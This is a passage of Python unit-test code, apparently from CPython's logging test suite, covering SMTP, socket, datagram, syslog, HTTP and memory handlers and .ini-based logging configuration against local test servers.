:param sockmap: A dictionary which will be used to hold
:class:`asyncore.dispatcher` instances used by
:func:`asyncore.loop`. This avoids changing the
:mod:`asyncore` module's global state.
"""
def __init__(self, addr, handler, poll_interval, sockmap):
smtpd.SMTPServer.__init__(self, addr, None, map=sockmap,
decode_data=True)
self.port = self.socket.getsockname()[1]
self._handler = handler
self._thread = None
self.poll_interval = poll_interval
def process_message(self, peer, mailfrom, rcpttos, data):
"""
Delegates to the handler passed in to the server's constructor.
Typically, this will be a test case method.
:param peer: The client (host, port) tuple.
:param mailfrom: The address of the sender.
:param rcpttos: The addresses of the recipients.
:param data: The message.
"""
self._handler(peer, mailfrom, rcpttos, data)
def start(self):
"""
Start the server running on a separate daemon thread.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the :mod:`asyncore` loop until normal termination
conditions arise.
:param poll_interval: The interval, in seconds, used in the underlying
:func:`select` or :func:`poll` call by
:func:`asyncore.loop`.
"""
asyncore.loop(poll_interval, map=self._map)
def stop(self, timeout=None):
"""
Stop the thread by closing the server instance.
Wait for the server thread to terminate.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.close()
support.join_thread(self._thread, timeout)
self._thread = None
asyncore.close_all(map=self._map, ignore_all=True)
class ControlMixin(object):
"""
This mixin is used to start a server on a separate thread, and
shut it down programmatically. Request handling is simplified - instead
of needing to derive a suitable RequestHandler subclass, you just
provide a callable which will be passed each received request to be
processed.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request. This handler is called on the
server thread, effectively meaning that requests are
processed serially. While not quite Web scale ;-),
this should be fine for testing applications.
:param poll_interval: The polling interval in seconds.
"""
def __init__(self, handler, poll_interval):
self._thread = None
self.poll_interval = poll_interval
self._handler = handler
self.ready = threading.Event()
def start(self):
"""
Create a daemon thread to run the server, and start it.
"""
self._thread = t = threading.Thread(target=self.serve_forever,
args=(self.poll_interval,))
t.daemon = True
t.start()
def serve_forever(self, poll_interval):
"""
Run the server. Set the ready flag before entering the
service loop.
"""
self.ready.set()
super(ControlMixin, self).serve_forever(poll_interval)
def stop(self, timeout=None):
"""
Tell the server thread to stop, and wait for it to do so.
:param timeout: How long to wait for the server thread
to terminate.
"""
self.shutdown()
if self._thread is not None:
support.join_thread(self._thread, timeout)
self._thread = None
self.server_close()
self.ready.clear()
class TestHTTPServer(ControlMixin, HTTPServer):
"""
An HTTP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval in seconds.
:param log: Pass ``True`` to enable log messages.
"""
def __init__(self, addr, handler, poll_interval=0.5,
log=False, sslctx=None):
class DelegatingHTTPRequestHandler(BaseHTTPRequestHandler):
def __getattr__(self, name, default=None):
if name.startswith('do_'):
return self.process_request
raise AttributeError(name)
def process_request(self):
self.server._handler(self)
def log_message(self, format, *args):
if log:
super(DelegatingHTTPRequestHandler,
self).log_message(format, *args)
HTTPServer.__init__(self, addr, DelegatingHTTPRequestHandler)
ControlMixin.__init__(self, handler, poll_interval)
self.sslctx = sslctx
def get_request(self):
try:
sock, addr = self.socket.accept()
if self.sslctx:
sock = self.sslctx.wrap_socket(sock, server_side=True)
except OSError as e:
# socket errors are silenced by the caller, print them here
sys.stderr.write("Got an error:\n%s\n" % e)
raise
return sock, addr
class TestTCPServer(ControlMixin, ThreadingTCPServer):
"""
A TCP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a single
parameter - the request - in order to process the request.
:param poll_interval: The polling interval in seconds.
:bind_and_activate: If True (the default), binds the server and starts it
listening. If False, you need to call
:meth:`server_bind` and :meth:`server_activate` at
some later time before calling :meth:`start`, so that
the server will set up the socket and listen on it.
"""
allow_reuse_address = True
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingTCPRequestHandler(StreamRequestHandler):
def handle(self):
self.server._handler(self)
ThreadingTCPServer.__init__(self, addr, DelegatingTCPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
def server_bind(self):
super(TestTCPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
class TestUDPServer(ControlMixin, ThreadingUDPServer):
"""
A UDP server which is controllable using :class:`ControlMixin`.
:param addr: A tuple with the IP address and port to listen on.
:param handler: A handler callable which will be called with a
single parameter - the request - in order to
process the request.
:param poll_interval: The polling interval for shutdown requests,
in seconds.
:bind_and_activate: If True (the default), binds the server and
starts it listening. If False, you need to
call :meth:`server_bind` and
:meth:`server_activate` at some later time
before calling :meth:`start`, so that the server will
set up the socket and listen on it.
"""
def __init__(self, addr, handler, poll_interval=0.5,
bind_and_activate=True):
class DelegatingUDPRequestHandler(DatagramRequestHandler):
def handle(self):
self.server._handler(self)
def finish(self):
data = self.wfile.getvalue()
if data:
try:
super(DelegatingUDPRequestHandler, self).finish()
except OSError:
if not self.server._closed:
raise
ThreadingUDPServer.__init__(self, addr,
DelegatingUDPRequestHandler,
bind_and_activate)
ControlMixin.__init__(self, handler, poll_interval)
self._closed = False
def server_bind(self):
super(TestUDPServer, self).server_bind()
self.port = self.socket.getsockname()[1]
def server_close(self):
super(TestUDPServer, self).server_close()
self._closed = True
if hasattr(socket, "AF_UNIX"):
class TestUnixStreamServer(TestTCPServer):
address_family = socket.AF_UNIX
class TestUnixDatagramServer(TestUDPServer):
address_family = socket.AF_UNIX
# - end of server_helper section
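# Usage sketch for the helpers above (hypothetical; mirrors how the handler
# tests below drive these servers). The handler callable receives the
# request-handler instance, so it can read from its connection directly:
#
# def on_request(request):
#     data = request.connection.recv(1024)
#     ... # record the payload for later assertions
#
# server = TestTCPServer(('localhost', 0), on_request)
# server.start()
# server.ready.wait()
# # clients connect to ('localhost', server.port); when finished:
# server.stop(timeout=2.0)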
class SMTPHandlerTest(BaseTest):
# bpo-14314, bpo-19665, bpo-34092: don't wait forever, timeout of 1 minute
TIMEOUT = 60.0
def test_basic(self):
sockmap = {}
server = TestSMTPServer((support.HOST, 0), self.process_message, 0.001,
sockmap)
server.start()
addr = (support.HOST, server.port)
h = logging.handlers.SMTPHandler(addr, 'me', 'you', 'Log',
timeout=self.TIMEOUT)
self.assertEqual(h.toaddrs, ['you'])
self.messages = []
r = logging.makeLogRecord({'msg': 'Hello \u2713'})
self.handled = threading.Event()
h.handle(r)
self.handled.wait(self.TIMEOUT)
server.stop()
self.assertTrue(self.handled.is_set())
self.assertEqual(len(self.messages), 1)
peer, mailfrom, rcpttos, data = self.messages[0]
self.assertEqual(mailfrom, 'me')
self.assertEqual(rcpttos, ['you'])
self.assertIn('\nSubject: Log\n', data)
self.assertTrue(data.endswith('\n\nHello \u2713'))
h.close()
def process_message(self, *args):
self.messages.append(args)
self.handled.set()
class MemoryHandlerTest(BaseTest):
"""Tests for the MemoryHandler."""
# Do not bother with a logger name group.
expected_log_pat = r"^[\w.]+ -> (\w+): (\d+)$"
def setUp(self):
BaseTest.setUp(self)
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr)
self.mem_logger = logging.getLogger('mem')
self.mem_logger.propagate = 0
self.mem_logger.addHandler(self.mem_hdlr)
def tearDown(self):
self.mem_hdlr.close()
BaseTest.tearDown(self)
def test_flush(self):
# The memory handler flushes to its target handler based on specific
# criteria (message count and message level).
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
# This will flush because the level is >= logging.WARNING
self.mem_logger.warning(self.next_message())
lines = [
('DEBUG', '1'),
('INFO', '2'),
('WARNING', '3'),
]
self.assert_log_lines(lines)
for n in (4, 14):
for i in range(9):
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
# This will flush because it's the 10th message since the last
# flush.
self.mem_logger.debug(self.next_message())
lines = lines + [('DEBUG', str(i)) for i in range(n, n + 10)]
self.assert_log_lines(lines)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines)
def test_flush_on_close(self):
"""
Test that the flush-on-close configuration works as expected.
"""
self.mem_logger.debug(self.next_message())
self.assert_log_lines([])
self.mem_logger.info(self.next_message())
self.assert_log_lines([])
self.mem_logger.removeHandler(self.mem_hdlr)
# Default behaviour is to flush on close. Check that it happens.
self.mem_hdlr.close()
lines = [
('DEBUG', '1'),
('INFO', '2'),
]
self.assert_log_lines(lines)
# Now configure for flushing not to be done on close.
self.mem_hdlr = logging.handlers.MemoryHandler(10, logging.WARNING,
self.root_hdlr,
False)
self.mem_logger.addHandler(self.mem_hdlr)
self.mem_logger.debug(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.info(self.next_message())
self.assert_log_lines(lines) # no change
self.mem_logger.removeHandler(self.mem_hdlr)
self.mem_hdlr.close()
# assert that no new lines have been added
self.assert_log_lines(lines) # no change
class ExceptionFormatter(logging.Formatter):
"""A special exception formatter."""
def formatException(self, ei):
return "Got a [%s]" % ei[0].__name__
class ConfigFileTest(BaseTest):
"""Reading logging config from a .ini-style config file."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
    # config8 checks for a resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
            # On Windows, replace each single backslash with a double backslash
            # to avoid a unicode error during string formatting.
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
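# Illustrative sketch (not part of the test suite): the .ini schema exercised
# above, fed to fileConfig() from an in-memory stream the same way
# apply_config() does.  Every logger, handler and formatter named in a keys=
# entry needs a matching [logger_*]/[handler_*]/[formatter_*] section.
def _fileconfig_sketch():
    import io, textwrap
    ini = textwrap.dedent("""
        [loggers]
        keys=root
        [handlers]
        keys=hand1
        [formatters]
        keys=form1
        [logger_root]
        level=WARNING
        handlers=hand1
        [handler_hand1]
        class=StreamHandler
        level=NOTSET
        formatter=form1
        args=(sys.stdout,)
        [formatter_form1]
        format=%(levelname)s ++ %(message)s
        datefmt=
        """)
    logging.config.fileConfig(io.StringIO(ini))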
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop(2.0)
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop(2.0)
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
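# Illustrative sketch (not part of the test suite): the wire format that
# handle_socket() above parses.  SocketHandler frames each record as a 4-byte
# big-endian length prefix followed by a pickled dict of record attributes;
# the receiver unpickles it and rebuilds a LogRecord with makeLogRecord().
# (The real makePickle() also flattens msg/args first; this is simplified.)
def _socket_wire_format_sketch():
    import pickle, struct
    record = logging.LogRecord('tcp', logging.ERROR, __file__, 1,
                               'spam', None, None)
    payload = pickle.dumps(record.__dict__, 1)
    frame = struct.pack('>L', len(payload)) + payload  # bytes on the wire
    # Receiving side: strip the prefix, unpickle, rebuild the record.
    slen = struct.unpack('>L', frame[:4])[0]
    rebuilt = logging.makeLogRecord(pickle.loads(frame[4:4 + slen]))
    return rebuilt.msg                                 # 'spam'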
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
    # We just need a name - the file must not exist, or binding will fail
    # with an 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop(2.0)
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
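# Illustrative sketch (not part of the test suite): DatagramHandler reuses
# SocketHandler's pickle format, so each UDP packet carries the same 4-byte
# length prefix plus pickled record dict -- which is why handle_datagram()
# above skips the first four bytes before unpickling.
def _datagram_decode_sketch(packet):
    import pickle, struct
    prefix_len = len(struct.pack('>L', 0))  # 4 bytes; the value is unused
    return logging.makeLogRecord(pickle.loads(packet[prefix_len:]))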
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop(2.0)
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
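# Illustrative sketch (not part of the test suite): where the b'<11>' prefix
# asserted above comes from.  The syslog priority is facility * 8 + severity;
# the handler's default facility is LOG_USER (1), and an ERROR record maps to
# the syslog severity 'error' (3), so 1 * 8 + 3 == 11.
def _syslog_priority_sketch():
    h = logging.handlers.SysLogHandler
    severity = h.priority_names[h.priority_map['ERROR']]  # 'error' -> 3
    return '<%d>' % ((h.LOG_USER << 3) | severity)        # '<11>'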
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(support.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop(2.0)
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
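# Illustrative sketch (not part of the test suite): HTTPHandler URL-encodes
# the dict returned by mapLogRecord() (record.__dict__ by default), sending
# it as the query string for GET or as the body for POST -- which is why the
# test above can recover 'name', 'funcName' and 'msg' with parse_qs().
def _http_payload_sketch():
    from urllib.parse import urlencode
    record = logging.LogRecord('http', logging.ERROR, __file__, 1,
                               'sp\xe4m', None, None)
    handler = logging.handlers.HTTPHandler('localhost:0', '/frob')
    return urlencode(handler.mapLogRecord(record))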
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
    def _assert_survival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
